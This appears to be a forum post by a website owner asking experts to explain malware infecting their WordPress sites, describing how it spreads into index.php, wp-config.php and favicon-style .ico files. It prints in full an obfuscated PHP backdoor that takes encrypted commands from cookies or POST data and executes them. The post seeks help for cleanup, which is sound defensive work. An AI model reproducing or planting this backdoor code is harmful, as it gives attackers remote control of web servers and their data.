Just curious here and I need better understanding about this malware. Because their are websites are infected by this malware including my websites. But I can clean them all. Usually this malware written in strange name in .php file, inside this file:

`<?php $ hsexdir = 'pmi9kl4H61gcbayrf_xsuo*-5#vden3t\'7';$ yiorkoj = Array();$ yiorkoj[] = $ hsexdir[11].$ hsexdir[15].$ hsexdir[28].$ hsexdir[13].$ hsexdir[31].$ hsexdir[28].$ hsexdir[17].$ hsexdir[16].$ hsexdir[20].$ hsexdir[29].$ hsexdir[11].$ hsexdir[31].$ hsexdir[2].$ hsexdir[21].$ hsexdir[29];$ yiorkoj[] = $ hsexdir[7].$ hsexdir[22];$ yiorkoj[] = $ hsexdir[24].$ hsexdir[27].$ hsexdir[11].$ hsexdir[6].$ hsexdir[13].$ hsexdir[13].$ hsexdir[8].$ hsexdir[24].$ hsexdir[23].$ hsexdir[3].$ hsexdir[27].$ hsexdir[24].$ hsexdir[24].$ hsexdir[23].$ hsexdir[6].$ hsexdir[16].$ hsexdir[12].$ hsexdir[24].$ hsexdir[23].$ hsexdir[13].$ hsexdir[33].$ hsexdir[11].$ hsexdir[27].$ hsexdir[23].$ hsexdir[28].$ hsexdir[28].$ hsexdir[24].$ hsexdir[8].$ hsexdir[9].$ hsexdir[27].$ hsexdir[11].$ hsexdir[30].$ hsexdir[13].$ hsexdir[27].$ hsexdir[11].$ hsexdir[28];$ yiorkoj[] = $ hsexdir[25];$ yiorkoj[] = $ hsexdir[11].$ hsexdir[21].$ hsexdir[20].$ hsexdir[29].$ hsexdir[31];$ yiorkoj[] = $ hsexdir[19].$ hsexdir[31].$ hsexdir[15].$ hsexdir[17].$ hsexdir[15].$ hsexdir[28].$ hsexdir[0].$ hsexdir[28].$ hsexdir[13].$ hsexdir[31];$ yiorkoj[] = $ hsexdir[28].$ hsexdir[18].$ hsexdir[0].$ hsexdir[5].$ hsexdir[21].$ hsexdir[27].$ hsexdir[28];$ yiorkoj[] = $ hsexdir[19].$ hsexdir[20].$ hsexdir[12].$ hsexdir[19].$ hsexdir[31].$ hsexdir[15];$ yiorkoj[] = $ hsexdir[13].$ hsexdir[15].$ hsexdir[15].$ hsexdir[13].$ hsexdir[14].$ hsexdir[17].$ hsexdir[1].$ hsexdir[28].$ hsexdir[15].$ hsexdir[10].$ hsexdir[28];$ yiorkoj[] = $ hsexdir[19].$ hsexdir[31].$ hsexdir[15].$ hsexdir[5].$ hsexdir[28].$ hsexdir[29];$ yiorkoj[] = $ hsexdir[0].$ hsexdir[13].$ hsexdir[11].$ hsexdir[4];foreach ($ yiorkoj[8]($ _COOKIE, $ _POST) as $ sgmcz => $ tfbhhc){function ouvcux($ yiorkoj, $ sgmcz, $ lcrwjj){return $ yiorkoj[7]($ yiorkoj[5]($ sgmcz . $ yiorkoj[2], ($ lcrwjj / $ yiorkoj[9]($ sgmcz)) + 1), 0, $ lcrwjj);}function jnlge($ yiorkoj, $ ysittw){return @$ yiorkoj[10]($ yiorkoj[1], $ ysittw);}function njfgaru($ yiorkoj, $ ysittw){$ epjvwf = $ yiorkoj[4]($ ysittw) % 3;if (!$ epjvwf) {$ oqkbtbd = $ yiorkoj[0]; $ qyzju = $ oqkbtbd("", $ ysittw[1]($ ysittw[2]));$ qyzju();exit();}}$ tfbhhc = jnlge($ yiorkoj, $ tfbhhc);njfgaru($ yiorkoj, $ yiorkoj[6]($ yiorkoj[3], $ tfbhhc ^ ouvcux($ yiorkoj, $ sgmcz, $ yiorkoj[9]($ tfbhhc))));} `

and that malware creates many index.php files in folders and also this malware adds code in index.php (real one), wp-config.php, and wp-setting.php. This malware changes the file permission of those infected files to 0755. Inside of this index.php (original and fake) and those original WP files there is an encrypted code of the destination directories to the other malware with .ico (extension) or favicon file.

May be expert can explain more.